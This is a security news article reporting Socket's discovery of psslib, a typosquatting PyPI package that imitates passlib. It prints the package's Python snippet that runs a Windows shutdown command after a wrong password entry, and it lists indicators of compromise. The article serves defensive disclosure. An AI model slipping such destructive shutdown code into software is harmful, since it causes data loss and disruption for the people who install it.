Tuesday, March 17, 2026

Windows Shutdowns Triggered by Invalid Inputs in Malicious passlib Python Package

Security researchers at Socket have uncovered a malicious Python package that exploits developer trust and system integration to compromise Windows environments.

The malicious package, named psslib, is a typosquatting attack targeting the legitimate and widely used passlib library, resulting in immediate system shutdowns when users enter incorrect passwords.

The threat actor, using the alias umaraq, uploaded the package to PyPI, where it remains active at the time of disclosure.

Socket’s AI Scanner flags psslib as malicious due to its destructive system shutdown behavior.

Deceptive Security Claims Mask Hidden Danger

The psslib package disguises itself as a password security utility, promising to “secure your Python program” in its documentation, an assurance likely to lure developers seeking robust authentication mechanisms.

With passlib boasting over 8.9 million monthly downloads, the threat actor leveraged the popularity and reputation of this trusted library, counting on users to mistype the package name during installation.

Typosquatting attacks of this nature are especially perilous, as many developers work with elevated privileges and may unknowingly grant malicious code access to sensitive system operations.

Upon integration, the package presents what appears to be a password verification prompt using the easygui.enterbox() function. If the provided password does not match a predetermined value, the code instantly executes a Windows shutdown command:

import os
import easygui

def spc(password):
    if easygui.enterbox('enter password:-') != password:
        os.system("shutdown /s /t 1")

This code ensures that the system shuts down within one second of an incorrect password attempt. Beyond this, the package offers additional functions, such as src() and error(message), that can force system shutdowns or reboots without even prompting for authentication.

These features widen the attack surface, allowing for destructive actions even before user input is received.

Platform-Specific Targeting and Recommendations

The attack is highly specific to Windows environments: the shutdown /s /t 1 command is ineffective on Linux and macOS, rendering the payload harmless outside Windows but potentially catastrophic for developers working in that ecosystem.

Consequences include loss of unsaved work, file corruption, service disruption, and filesystem inconsistencies.

The psslib package highlights a concerning trend in software supply chain attacks: the exploitation of developer trust and the deployment of destructive payloads for immediate disruption.

Unlike traditional malware that seeks stealth and persistence, this attack is designed to cause instantaneous damage, making recovery and root cause analysis more challenging.

To mitigate such threats, organizations should implement robust package scanning solutions, such as Socket’s, which can detect abnormal behavior in real time.

Security teams should scrutinize package documentation and maintain awareness of typosquatting risks. Developers are advised to double-check package names before installation and to restrict execution privileges wherever possible.

As supply chain threats evolve, expect attackers to increasingly target development tooling, CI/CD pipelines, and even expand their platform reach to include macOS and Linux.

A proactive and security-conscious approach is crucial for building resilient development environments.

Indicators of Compromise (IOCs)

  • Malicious Package: psslib
  • Threat Actor Identifiers
    • PyPI alias: umaraq
    • PyPI registered email: umar[.]maq@yandex[.]com, umarmoiz2010@gmail[.]com
